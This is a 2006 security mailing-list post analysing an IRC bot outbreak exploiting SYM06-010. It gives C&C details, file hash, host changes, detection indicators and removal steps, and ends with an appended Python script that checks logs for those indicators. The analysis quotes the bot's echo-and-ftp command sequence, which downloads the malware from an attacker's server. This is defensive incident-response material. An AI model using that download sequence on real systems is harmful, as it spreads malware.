[unisog] More: Bot outbreak exploiting SYM06-010

Brian Eckman eckman at umn.edu
Tue Nov 28 00:02:11 GMT 2006

We had a number of hosts become infected with an IRC bot today that used
www.flackware.info as the Command and Control. Here is information that
I know so far:

Command and Control
. www.flackware.info:6667/tcp (the only apparent name/port used)
. (auto)JOIN #text airforce

File Info
. MD5(w32svc.exe)= 44a48fb5813d79c9a733bc941a9a548f
. w32svc.exe is 1.12 MB (1,182,208 bytes)  (MASSIVE for a bot!)
. Symantec definitions 11/27/2006 rev.50 and later will detect it as a
Spybot variant

How to Obtain
The bot uses a built-in FTP server ("Reptile", a.k.a. "StnyFTPd") to
spread. When it compromises a machine, it executes the following commands:

echo open (ip address of attacker) (ftp server port) > i
echo user 1 1 >> i
echo get w32svc.exe >> i
echo quit >> i
ftp -As:i

When Run
. Installs itself to %WINDIR%\w32svc.exe
. Sets Windows File Protection to "Scan only at bootup"
. Moves ftp.exe and tftp.exe to %WINDIR%\System32\Microsoft\backup.ftp
and backup.tftp
. Drops a new ftp.exe and tftp.exe to %WINDIR%\System32\
. Attempts to connect to the Command and Control server
. Installs itself as a service in many places within the registry

Infection Vectors
. Almost certainly via SYM06-010
. Almost certainly other Windows vulnerabilities (since patched)

Detecting Infections - Network
. Looking for DNS queries for www.flackware.info
. Looking for network traffic to port 6667/tcp going to the IP address
for www.flackware.info
. Looking for scanning (more than 3-4 destinations) on port 2967/tcp

Identifying Infection - At the Computer
. Look for %WINDIR%\w32svc.exe
. Look for a Service called "Windows Network Firewall"

Symantec definitions 11/27/2006 rev.50 performed admirably on my test
box. Assuming the host did not have any other malware loaded onto it
after infection, updating the AV defs to that "rev" or later, scanning
the hard drive, then rebooting when prompted should do the trick.

Manual Removal: Set the "Windows Network Firewall" service to
"Disabled", and reboot (you can't stop the service while it is running).
Delete the w32svc.exe file, and preferably, remove the associated
(dozens of) registry keys.


Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance
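
The three network checks listed under "Detecting Infections - Network", as an added example that is not part of the original message: it runs the post's indicators (a DNS query for the C&C name, a 6667/tcp flow to its address, and more than three distinct destinations on 2967/tcp) over constructed DNS and flow records. The record formats, the placeholder C&C address 203.0.113.10 and the function names are assumptions.

```python
from collections import defaultdict
C2_HOST, C2_PORT = "www.flackware.info", 6667   # IRC C&C name and port from the post
SCAN_PORT, SCAN_THRESHOLD = 2967, 3              # port the spreader scans; flag > 3 destinations

# Constructed sample logs, not real traffic. Assumed record formats:
#   DNS:  "<time> <client_ip> query <name>"
#   flow: "<time> <src_ip> <dst_ip> <proto> <dst_port>"
DNS_LOG = """\
09:01:02 10.0.0.5 query www.flackware.info
09:01:03 10.0.0.7 query www.example.org
09:02:10 10.0.0.9 query WWW.Flackware.Info.
"""
FLOW_LOG = """\
09:01:05 10.0.0.5 203.0.113.10 tcp 6667
09:01:06 10.0.0.7 198.51.100.20 tcp 80
09:01:07 10.0.0.5 10.0.1.1 tcp 2967
09:01:07 10.0.0.5 10.0.1.2 tcp 2967
09:01:07 10.0.0.5 10.0.1.3 tcp 2967
09:01:08 10.0.0.5 10.0.1.4 tcp 2967
09:01:09 10.0.0.7 10.0.1.1 tcp 2967
09:01:09 10.0.0.7 10.0.1.1 tcp 2967
"""
C2_IP = "203.0.113.10"  # placeholder; use whatever the C&C name resolves to at the time

def dns_c2_lookups(dns_log, c2_host=C2_HOST):
    """Clients that asked the resolver for the C&C name (case-insensitive, trailing dot ignored)."""
    hits = set()
    for line in dns_log.splitlines():
        _, client, _, name = line.split()
        if name.lower().rstrip(".") == c2_host:
            hits.add(client)
    return hits

def irc_c2_connections(flow_log, c2_ip=C2_IP):
    """Sources with a TCP flow to the C&C address on the IRC port."""
    hits = set()
    for line in flow_log.splitlines():
        _, src, dst, proto, dport = line.split()
        if proto == "tcp" and dst == c2_ip and int(dport) == C2_PORT:
            hits.add(src)
    return hits

def port2967_scanners(flow_log, threshold=SCAN_THRESHOLD):
    """Sources that touched more than `threshold` distinct hosts on 2967/tcp (distinct destinations, not flows)."""
    dests = defaultdict(set)
    for line in flow_log.splitlines():
        _, src, dst, proto, dport = line.split()
        if proto == "tcp" and int(dport) == SCAN_PORT:
            dests[src].add(dst)
    return {src for src, d in dests.items() if len(d) > threshold}
```

The repeated 10.0.0.7 flows to one host count as a single destination, so only 10.0.0.5, which hit four distinct hosts, is flagged as a scanner.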